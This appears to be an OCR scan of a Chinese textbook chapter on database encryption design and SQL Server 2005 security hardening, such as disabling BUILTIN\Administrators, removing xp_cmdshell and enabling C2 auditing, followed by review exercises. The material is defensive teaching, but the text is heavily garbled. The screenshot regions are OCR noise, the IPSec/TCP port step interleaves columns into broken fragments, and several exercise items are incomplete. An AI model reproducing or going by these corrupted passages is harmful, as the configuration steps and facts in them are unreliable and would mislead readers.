数据 库 的 备份 内 容 成 为 密 文 ， 从 而 能 减少 因 备份 介质 失窃 或 丢失 而 造成 的 损失 。 由 此 可 
见 ， 数 据 库 加 密 对 于 企业 内 部 安全 管理 也 是 不 可 或 缺 的 。 

也 许 有 人 认为 ， 对 数据 库 加 密 后 会 严重 影响 数据 库 系统 的 效率 ， 使 系统 不 堪 重 负 。 事 
实 并 非 如 此 。 如 果 在 数据 库 客户 端 进行 数据 加 密 / 解密 运算 ， 对 数据 库 服 务 器 的 负载 及 系 
统 运行 几乎 没有 影响 。 比 如 ， 在 普通 PC 上 ， 用 纯 软 件 实现 DES 加 密 算法 的 速度 超过 
200KB/s， 如 果 对 一 篇 1 万 个 汉字 的 文章 进行 加 密 ， 其 加 密 / 解密 时 间 仅 需 0.1s， 这 种 时 
间 延 迟 用 户 几乎 无 感觉 。 目前， 加密 卡 的 加 密 / 解密 速度 一 般 为 1Mb/s， 对 中 小 型 数据 库 
系统 来 说 ， 这 个 速度 即使 在 服务 器 端 进 行 数据 的 加 密 / 解密 运算 也 是 可 行 的 ， 因 为 一 般 的 
关系 型 数据 项 都 不 会 太 长 。 


1. 数据 库 加 密 的 要 求 


一 个 良好 的 数据 库 加密 系 统 应 该 满足 以 下 基本 要 求 。 

1) 字段 加 密 

在 目前 条 件 下 ， 加 密 / 解密 的 粒度 是 每 个 记录 的 字段 数据 。 如 果 以 文件 或 列 为 单位 进 
行 加 密 ， 必 然 会 形成 密 钥 的 反复 使 用 ， 从 而 降低 加 密 系 统 的 可 靠 性 ， 或 者 因 加 密 / 解密 时 
间 过 长 而 无 法 使 用 。 只 有 以 记录 的 字段 数据 为 单位 进行 加 密 / 解密 ， 才 能 适应 数据 库 操 
作 ， 同 时 进行 有 效 的 密 钥 管 理 并 完成 “一 次 一 密 钥 ”的 密码 操作 。 

2) 密 钥 动态 管理 

数据 库 客体 之 间 隐 含 着 复杂 的 逻辑 关系 ， 一 个 逻辑 结构 可 能 对 应 着 多 个 数据 库 物 理 客体 ， 
所 以 数据 库 加 密 不 仅 密 钥 量 大 ， 而 且 组 织 和 存储 工作 较 复杂 ， 需 要 对 密 钥 实行 动态 管理 。 

3) 合理 处 理 数 据 

合理 处 理 数 据 包 括 几 方面 的 内 容 。 首 先 要 恰当 地 处 理 数据 类 型 ， 否 则 DBMS 将 会 因 加 
密 后 的 数据 不 符合 定义 的 数据 类 型 而 拒绝 加 载 。 其 次 ， 需 要 处 理 数据 的 存储 问题 ， 实 现 数 
据 库 加 密 后 应 基本 上 不 增加 空间 开销 。 在 目前 条 件 下 ,数据库 关 系 运 算 中 的 匹配 字段 (如 表 
间 连 接 码 、 索 引 字 段 等 ) 数 据 不 宜 加 密 。 

4) 不 影响 合法 用 户 的 操作 

要 求 加 密 系统 对 数据 操作 响应 的 时 间 尽 量 短 。 在 现 阶 段 ， 平 均 延 迟 时 间 不 应 超过 
0.1s。 此 外 ， 对 数据 库 的 合法 用 户 来 说 ， 数 据 的 录入 、 修 改 和 检索 操作 应 该 是 透明 的 ， 不 
需要 考虑 数据 的 加 密 / 解密 问题 。 

2. 数据 库 加 密 的 层次 

可 以 考虑 在 3 个 不 同 层次 实现 对 数据 库 数 据 的 加 密 ， 这 3 个 层次 分 别 是 操作 系统 层 、 
DBMS 内 核 层 和 DBMS 外 层 。 

在 操作 系统 层 ， 无 法 辨认 数据 库 文件 中 的 数据 关系 ， 从 而 无 法 产生 合理 的 密 钥 ， 也 无 
法 进行 合理 的 密 钥 管理 和 使 用 。 所 以 ， 在 操作 系统 层 对 数据 库 文件 进行 加 密 ， 对 于 大 型 数 
据 库 来 说 ， 目 前 还 难以 实现 。 
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在 DBMS 内 核 层 实现 加 密 ， 是 指数 据 在 物理 存 取 之 前 完成 加 密 / 解密 工作 。 这 种 方式 
势必 造成 DBMS 和 加 密 器 (硬件 或 软件 ) 之 间 的 接口 需要 DBMS 开发 商 的 支持 。 这 种 加 密 方 
式 的 优点 是 加 密 功 能 强 ， 并 且 加 密 功 能 几乎 不 会 影响 DBMS 的 功能 ， 可 以 实现 加 密 功 能 与 
数据 库 管理 系统 之 间 的 无 缝 耦合。 但 这 种 方式 的 缺点 是 在 服务 器 端 进行 加 密 / 解密 运算 ， 
加 重 了 数据 库 服务 器 的 负载 。 这 种 加 密 方式 如 图 9.1 所 示 。 

比较 实际 的 做 法 是 将 数据 库 加 密 系统 做 成 DBMS 的 一 个 外 层 工具 (图 9.2)。 采 用 这 种 
加 密 方式 时 ， 加 密 / 解密 运算 可 以 放 在 客户 端 进行 ， 其 优点 是 不 会 加 重 数据 库 服务 器 的 负 
载 ， 并 可 实现 网 上 传输 加 密 ， 缺 点 是 加 密 功能 会 受到 一 些 限 制 ， 与 数据 库 管 理 系统 之 间 的 
耦合 性 稍 差 。 图 9.2 中 “加 密 定义 工具 ”模块 的 主要 功能 是 定义 如 何 对 每 个 数据 库 表 数据 
进行 加 密 。 在 创建 了 一 个 数据 库 表 后 ， 通 过 这 一 工具 对 该 表 进行 定义 ;， “数据 库 应 用 系 
统 ” 的 功能 是 完成 数据 库 定 义 和 操 作 。 数 据 库 加 密 系统 将 根据 加 密 要 求 自动 完成 对 数据 库 
数据 的 加 密 / 解密 。 


定义 加 密 要 求 工具 


加 密 定义 工具 


一 数据 库 应 用 
msn | | a 
(软件 或 硬件 ) 


(软件 或 硬件 ) 


图 9.1 DBMS 内 核 层 加 密 关系 图 9.2 DBMS 外 层 加 密 关系 


3. 数据 库 加 密 的 有 关 问 题 


数据 库 加 密 系 统 首先 要 解决 系统 本 身 的 安全 性 和 可 靠 性 问题 ， 在 这 方面 可 以 采用 以 下 
几 项 安全 措施 。 

1) 在 用 户 进入 系统 时 进行 两 级 安全 控制 

这 种 控制 可 以 采用 多 种 方式 ， 包 括 设置 数据 库 用 户 名 和 口令 ， 或 者 利用 工 C 卡 读 写 
器 、 指 纹 识别 器 进行 用 户 身份 认证 。 

2) 防止 非法 复制 

对 于 纯 软 件 系统 ， 可 以 采用 软 指 纹 技术 防止 非法 复制 。 当 然 ， 如 果 每 台 客 户 机 上 都 安 
装 加 密 卡 等 硬 部 件 ， 安 全 性 会 更 好 。 此 外 ， 还 应 该 保留 数据 库 原 有 的 安全 措施 ， 如 权限 控 
制 、 备 份 / 恢复 和 审计 控制 等 。 

3) 安全 的 数据 抽取 方式 

数据 库 加 密 系 统 提供 两 种 数据 库 中 卸 出 和 装 入 加 密 数 据 的 方式 。 
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Q@ 密 文 方式 卸 出 。 这 种 卸 出 方式 不 解密 ， 和 出 的 数据 还 是 密 文 ， 在 这 种 模式 
直接 使 用 DBMS 提供 的 卸 出 / 装 入 工具 。 

@ 明文 方式 卸 出 。 这 种 印 出 方式 需要 解密 ， 卸 出 的 数据 是 明文 ， 在 这 种 模式 下 ， 可 
利用 系统 专用 工具 先进 行 数据 转换 ， 再 使 用 DBMS 提供 的 卸 出 / 装 入 工具 完成 。 


4. 数据 库 加 密 系统 结构 


数据 库 加 密 系统 分 成 两 个 功能 独立 的 主要 部 件 ， 一 个 是 加 密 字典 管理 程序 ， 另 一 个 是 
数据 库 加 密 / 解密 引擎 。 数 据 库 加 密 系 统 体系 结构 如 图 9.3 所 示 。 


数据 库 加 / 解 
密 引 擎 


9.3 数据库 加 密 系统 体系 结构 


数据 库 加 密 系统 将 用 户 对 数据 库 信息 具体 的 加 密 要 求 记载 在 加 密 字典 中 ， 加 密 字典 是 
数据 库 加 密 系统 的 基础 信息 ， 通 过 调用 数据 库 加 密 / 解密 引擎 实现 对 数据 库 表 的 加 密 、 解 
密 及 数据 转换 等 功能 。 数 据 库 信 息 的 加 密 / 解密 处 理 是 在 后 台 完 成 的 ， 对 数据 库 服 务 器 是 
透明 的 。 

加 密 字典 管理 程序 是 管理 加 密 字典 的 实用 程序 ， 是 数据 库 管 理 员 变更 加 密 要 求 的 工 
具 。 加 密 字 典 管理 程序 通过 数据 库 加 密 / 解密 引擎 实现 对 数据 库 表 的 加 密 、 解 密 及 数据 转 
换 等 功能 ， 此 时 ， 它 作为 一 个 特殊 客户 来 使 用 数据 库 加 密 / 解密 引擎 。 

数据 库 加 密 / 解密 引擎 是 数据 库 加 密 系统 的 核心 部 件 ， 它 位 于 应 用 程序 与 数据 库 服务 
器 之 间 ， 负 责 在 后 台 完 成 数据 库 信 息 的 加 密 / 解密 处 理 ， 对 应 用 开发 人 员 和 操作 人 员 来 说 
是 透明 的 。 数 据 加 密 / 解密 引擎 没有 操作 界面 ， 在 需要 时 由 操作 系统 自动 加 载 并 驻 留 在 内 
存 中 ， 通 过 内 部 接口 与 加 密 字典 管理 程序 和 用 户 应 用 程序 通信 。 

数据 库 加 密 / 解密 引擎 由 三 大 模块 组 成 ， 即 数据 库 接口 模块 、 用 户 接口 模块 和 加 密 / 
解密 处 理 模块 。 其 中 ， 数 据 库 接口 模块 的 主要 工作 是 接受 用 户 的 操作 请 求 ， 并 传递 给 加 密 
/ 解密 处 理 模块 ， 此 外 还 要 代替 加 密 / 解密 处 理 模块 去 访问 数据 库 服务 器 ， 并 完成 外 部 接 
参数 与 加 密 / 解密 引擎 内 部 数据 结构 之 间 的 转换 。 加 密 / 解密 处 理 模块 完成 数据 库 加 密 
/ 解密 引擎 的 初始 化 、 内 部 专用 命令 的 处 理 、 加 密 字 典 信 息 的 检索 、 加 密 字 典 缓冲 区 的 管 
理 、SQL 命令 的 加 密 变换 、 查 询 结 果 的 解密 处 理 以 及 加 密 / 解密 算法 的 实现 等 功能 ， 另 外 
还 包括 一 些 公用 的 辅助 函数 。 

数据 库 加 密 系 统 能 够 有 效 地 保证 数据 的 安全 ， 即 使 黑客 窃取 了 关键 数据 ， 仍 然 难 以 得 
到 所 需 的 信息 ， 因 为 所 有 的 数据 都 经 过 了 加 密 。 另 外 ， 数 据 库 加 密 以 后 ， 可 以 设 定 不 需要 
了 解数 据 内 容 的 系统 管理 员 不 能 见 到 明文 ， 这 样 可 大 大 提高 关键 性 数据 的 安全 性 。 
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数据 库 系 统 安 全 管理 实例 一 MS SQL Server 2005 安全 管理 。 


(1) 启动 “Microsoft SQL Server Management Studio”， 如 图 9.4 所 示 ， 在 “对 
管理 器 ” 窗 


中 选择 “ZTG2003 ”一 “安全 性 ”一 “登录 名 ”选项 。 在 右 侧 窗 
wi 弹出 


bh“ 登录 属性 -sa” 对 话 框 ， 如 图 9.5 所 示 。 


9.4 Microsoft SQL Server Management Studio 


(2) 在 图 9.5 中 ， 选 中 “强制 实施 密码 策略 ” 复 选 框 ， 对 sa 用 户 进行 最 强 的 保护 ， 另 


外 ， 密 码 的 选择 也 要 足够 复杂 。 


图 9.5 “登录 属性 -sa” 对 话 框 


(3) 在 SQL Server 2005 中 有 Windows 身份 认证 和 混合 身份 认证 。 如 果 不 希望 系统 管 


理 员 登录 数据 库 ， 可 以 把 系统 账号 “BUILTIN\Administrators ”删除 或 禁止 ， 在 图 9.4 


日 
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右键 单 击 BUILTIN\Administrators 账号 ， 选 择 快捷 菜单 
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P 的 “属性 ”命令 ， 弹 出 “登录 属 


性 -BUILTIN\ Administrators” 对 话 框 ， 如 图 9.6 所 示 ， 单 击 左 侧 窗口 中 的 “状态 ”， 在 右 侧 


窗口 中 ， 把 “是 否 允许 连接 到 

(4) 使 用 IPSec 策略 阻 」| 
改 ， 不 过 ， 在 SQL Server 
Configuration Manager， 如 图 


命令 ， 弹 出 “TCP/IP 属性 ”对 话 框 ， 如 图 9.8 所 示 ， 在 “TCP 动态 端 


上 所 有 访问 本 机 的 TCP1433， 也 可 以 对 TCP1433 
2005 中 ， 可 以 使 用 TCP 动态 端口 ， 启 动 


“0”。 配 置 为 监听 动态 端口 


设置 为 “是 ”， 


” 即 可 。 
端口 进行 修 
SQL Server 


9.7 所 示 ， 右 键 单 击 “TCP/ITP”， 选 择 快捷 菜单 中 的 “属性 ” 


” 右 侧 输入 


， 在 启动 时 会 检查 操作 系统 中 的 可 用 端口 ， 并 且 从 中 选择 一 
个 。 如 图 9.9 所 示 ， 可 以 指定 SQL Server 是 否 监听 所 有 绑 定 到 计算 机 网 卡 的 下 地 址 。 如 果 
则 IPALL 属性 框 的 设置 将 应 用 于 所 有 IP 地 址 ;如 果 设置 为 “ 否 ”， 则 使 


9.6 “登录 属性 -BUILTINWAdministrators” 


本 al eh) 文件 四 换 作 他) 查看 Y) 帮助) 
有 人 至 | 折 | 加 民 | 思 
多 安 全 对 和 是 否 多 许 壹 按 马 数 疾 库 引擎 - 4 
> ca 1 CE 
人 拒 反 四 的 协议 
已 用 
太 局 用 加 ) 
人 本 用 人) 
状态 
SQL Server 身份 驻 证 : 
厂 末了 EU 让 四 到 


用 每 个 人 P 地址 各 自 的 属性 对 话 框 对 各 个 IP 地 址 进行 配置 。 默 认 值 为 “是 ”。 


协议 | 地 址 | 
FS 
保 特 堪 动 状 春 30000 

TCP 动态 网 品 Er 得 

TCP 博 吕 1433 己 自 用 a 

活动 是 

已 自用 理 
上 日 Tr7 

TIP 地 由 127.0.0.1 

TCP 动态 网 口 

TCP 端口 1433 

括 动 是 

已 自用 3 
IB 1rar 

9 

TCP 碳 口 1433 | 
ICP 动 春 硬 口 全 部 重 世 
如 困 未 启用 动态 网 口 ， 则 窗 交 。 若 村 使 用 动态 冶 口 ， 鹿 设 吾 为 0- 值 听 所 有 IE 

Ce mw | maw | Ww | 
图 9.8 “TCP/IP 属性 ”对 话 框 图 9.9 监听 设置 


(5) 删除 不 必要 的 扩展 存储 过 程 (或 存储 过 程 )。 
因为 有 些 存 储 过 程 能 够 很 容易 地 被 入 侵 者 利用 来 提升 权限 或 进行 破坏 ， 所 以 需要 将 必 


要 的 存储 过 程 或 扩展 存储 过 程 删除 。xp_cmdshell 是 一 个 很 危险 的 扩展 存储 过 程 ， 如 果 不 需 
要 xp_cmdshell， 那 么 最 好 将 它 删 除 。 删 除 的 方法 如 图 9.10 所 示 。 
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祯 图 呈 。 项 目 @) 工具 中 


定 D 定 口 和 
入 | 辣 访 号 记 | 芒 回 身 | 信 目 双 芒 也 


-| 
Em4 


lr WE 人 


蚂 殊 外 


WB Zrs2009 (Gal Server 9.0.1399 ~ ZT02003\An | 
瑟 加 数据 库 


加 系统 


ZT92003\ 数 蜂 库 \ 东 区 数 曙 库 \nsster\ 可 编程 性 :扩展 存 千 过 程 \ 系 统 扩展 存储 过 程 


扩展 存储 过 程 


1 项 


昌国 系统 存储 过 程 
回回 函 歼 
日 国 扩展 存 博 过程 
让 系 综 扩展 存 能 过程 
四 加 数据 库 串 发 器 
下 各 了 末 
回回 类 型 
田 国 规则 
回 辆 默 从 值 
a Servise Brule 
回国 存 铺 
田 国 安全 性 
田 国 was 
田 晤 wa 
田 国 tenptb 
田园 当世 库 锯 昭 
固 是 memzoce 


| 


ee 
a 
pe 


Ep_exum_sledb_providers 
edepaers 
i 

pe roups 
et 


| 


(6) 在 医 
性 ”命令 ， 弹 出 “服务 器 属性 -ZTG2003” 


ZT6 


2003 


ET 


图 9.10 删除 扩展 存储 过 程 
单 击 “ZTG2003”( 位 于 图 的 左上 角 )， 选 择 快捷 菜单 


对 话 框 ， 如 图 9.11 所 示 。 


服务 器 身份 验证 


个 Windowrs 身份 验证 模式 ED) 


警 录 审 核 


个 无 WD 

个 仅 限 失 册 的 芸 录 2) 
个 如 限 成 功 的 登录 0 
人 失败 和 成 功 的 莹 录 中) 
服务 器 代理 帐户 

厂 局 用 服务 器 代理 帐户 Y) 
代理 几 户 四 

B00) 

服务 器 

2ZT62003 

连接 

ZTG2003\Adnini strator 


惠 查看 连接 属性 


就 绪 


人 SQL Server 和 Windows 身份 验证 模式 G) 


Ph 的 “ 属 


图 9.11 
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“服务 器 属性 -ZTG2003” 对 话 框 
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在 图 9.11 中 ， 单 击 左 侧 窗口 中 的 “安全 性 ”， 在 右 侧 窗口 中 选中 “登录 审核 ”中 的 
“失败 和 成 功 的 登录 ” 单 选 按钮 ， 选 中 “启用 C2 审核 跟踪 ” 复 选 框 ，C2 是 一 个 政府 安全 
等 级 ， 它 确保 系统 能 够 保护 资源 并 且 具 有 足够 的 审核 能 力 。C2 允许 监视 对 所 有 数据 库 实体 
的 所 有 访问 企图 。 


复习 思考 题 九 


下 填空 题 

1. 按 数据 备份 时 备份 的 数据 不 同 ， 可 有 和 按 需 备 
份 等 备份 方式 。 

2. 数据 恢复 操作 通常 可 分 为 3 类 ， 即 S 和 重 定向 恢复 。 

3. 数据 备份 是 数据 容 灾 的 

4. 常见 的 灾难 备份 等 级 有 4 级 ， 即 第 级 、 第 级 、 第 级 
和 第 级 。 

5. 数据 的 是 指 保护 网 络 中 存储 和 传输 数据 不 被 非法 改变 。 

6. 数据 库 安 全 包括 数据 库 安全 性 和 数据 库 安全 性 两 层 含义 。 

7 是 指 在 多 用 户 的 环境 下 ， 对 数据 库 的 并 行 操作 进行 规范 的 机 制 ， 从 而 保 


证 数据 的 正确 性 与 一 致 性 。 
8， 当 故障 影响 数据 库 系 统 操作 ， 甚 至 使 数据 库 中 数据 全 部 或 部 分 丢失 时 ， 和 希望 能 尽 
快 恢复 到 原 数据 库 状态 或 重建 一 个 完整 的 数据 库 ， 该 处 理 称 为 


9. 是 指 为 防止 系统 出 现 操作 失误 或 系统 故障 导致 数据 丢失 ， 而 将 全 系统 或 
部 分 数据 从 主机 的 硬盘 或 阵列 中 复制 到 其 他 存储 介质 上 的 过 程 。 

10， 影响 数据 完整 性 的 主要 因素 有 、 软 件 故障 、 、 人 为 威胁 和 意 
外 灾难 等 。 

1 是 指数 据 库 的 任何 部 分 都 没 受到 侵害 ， 或 没 受 到 未 经 授权 的 存 取 和 修 
次 

12. 数据 的 就 是 数据 与 应 用 程序 之 间 不 存在 相互 依赖 关系 ， 也 就 是 数据 的 逻 
辑 结 构 、 存 储 结构 和 存 取 方 法 等 不 因应 用 程序 的 修改 而 改变 ; 反之 亦 然 。 

二 、 单 项 选择 题 

1. 按 数据 备份 时 数据 库 状 态 的 不 同 有 ( EE 

A.， 热 备份 B. 冷 备份 C、 逻 辑 备份 D. A、B、C 都 对 


2. 数据 库 系 统 的 安全 框架 可 以 划分 为 网 络 系统 、( ”) 和 DBMS 3 个 层次 。 
A. 操作 系统 B. 数据 库 系统 C. 软件 系统 D. 容错 系统 
3. 按 备份 周期 对 整个 系统 所 有 的 文件 进行 备份 的 方式 是 (  ) 备 份 。 
A. 完全 B. 增 量 C.、 差别 D. 按 需 
4. 在 网 络 备 份 系统 中 ，( ”) 是 执行 备份 或 恢复 任务 的 系统 ， 它 提供 一 个 集中 管理 和 
控制 平台 ， 管 理 员 可 以 利用 该 平台 去 配置 整个 网 络 备份 系统 。 
A. 目标 B. 工具 C. 通道 D. 存储 设备 


.sa 
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三 、 问 答题 


2 wm 


简 述 数据 库 数 据 的 安全 措施 。 

简 述 数据 库 系 统 安全 威胁 的 来 源 。 

什么 叫 数 据 库 的 完整 性 ?数据 库 的 完整 性 约束 条 件 有 哪些 ? 
简 述 保护 数据 完整 性 的 容错 方法 。 

什么 叫 数据 备份 ?数据 备份 有 哪些 类 型 ? 


.什么 叫 数据 容 灾 ? 数据 容 灾 技术 有 哪些 ? 
。 简要 介绍 同步 远程 镜像 和 异步 远程 镜像 技术 。 
.简要 介绍 虚拟 存储 技术 。 
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